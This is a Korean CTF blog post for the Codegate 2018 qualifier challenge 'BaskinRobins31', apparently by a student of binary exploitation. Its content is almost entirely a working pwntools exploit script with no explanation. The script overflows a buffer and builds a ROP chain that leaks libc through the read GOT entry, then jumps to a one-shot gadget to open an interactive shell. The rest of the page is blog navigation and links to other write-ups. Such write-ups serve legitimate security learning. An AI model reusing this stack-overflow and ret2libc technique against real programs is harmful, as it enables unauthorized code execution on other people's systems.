티스토리 뷰

Pwnable/write up

[Codegate2018_quals] BaskinRobins31

xxvd 2018. 9. 16. 13:23
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from pwn import *
 
= process('./BaskinRobins31')
= ELF('./BaskinRobins31')
context(arch='amd64',os='linux',endian='little',log_level='debug')
 
POP_RDI_RSI_RDX_RET = 0x0040087a
main = 0x400a4b
 
payload="A"*184
payload+=p64(POP_RDI_RSI_RDX_RET)
payload+=p64(1)
payload+=p64(e.got['read'])
payload+=p64(8)
payload+=p64(e.plt['write'])
payload+=p64(main)
 
 
p.send(payload)
 
#print p.recvuntil("Don't break the rules...:(")
p.recvuntil(":( \n")
read =  u64(p.recv(6)+"\x00"*2)
log.success("read leaked : "+hex(read))
 
libc_base = read - 0xf7250 # in local 
oneshot = libc_base + 0xf1147 # in local
 
payload1="A"*184
payload1+=p64(oneshot)
 
p.sendline(payload1)
 
p.interactive()
 
cs


'Pwnable > write up' 카테고리의 다른 글

[Sunrin Internel CTF] cee  (0) 2018.09.16
[PlaidCTF 2013] ropasaurusrex  (0) 2018.09.16
[HITCON 2017] start  (0) 2018.09.14
[Defcon 2016]feedme  (0) 2018.08.27
[TAMU ctf 2018] pwn4  (0) 2018.05.17
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG
more
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
글 보관함